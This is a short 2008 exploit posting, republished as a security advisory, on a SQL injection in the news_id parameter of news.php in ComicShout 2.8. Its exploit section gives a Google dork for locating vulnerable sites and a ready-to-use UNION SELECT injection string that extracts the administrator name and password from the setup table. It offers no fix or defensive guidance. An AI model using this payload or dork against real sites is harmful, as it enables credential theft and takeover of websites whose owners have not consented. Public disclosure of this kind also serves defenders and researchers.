Computer Security

Security Advisory: ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [ECHO_ADV_96$2008] HiveMaker Professional <= 1.0.2 (cid) Sql Injection Vulnerability

  OtomiGenX v2.2 Ultimate  Authentication bypass Vulnerability

  BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability

  New vulnerabilities in Power Phlogger

From:Jose Luis Góngora Fernández <sys-project_(at)_hotmail.com>
Date:02.06.2008
Subject:ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+         ComicShout 2.8 (news.php news_id) Remote SQL Injection Vulnerability       +==--
--
==+==============================================================================
======+==--
                        - dreaming of necessity is reason to comply -

[+] Info:

[~] Bug found by JosS
[~] sys-project[at]hotmail.com
[~] http://www.spanish-hackers.com
[~] EspSeC & Hack0wn!.


[~] Software: ComicShout 2.8
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: news.php

[~] Dork: "Powered by ComicShout"

[+] Exploit:

[~] /news.php?news_id=[SQL]
[~] 4+union+all+select+0,1,site_admin,site_pass+from+setup/*

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--
==+==============================================================================
======+==--
                                      [+] [The End]
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru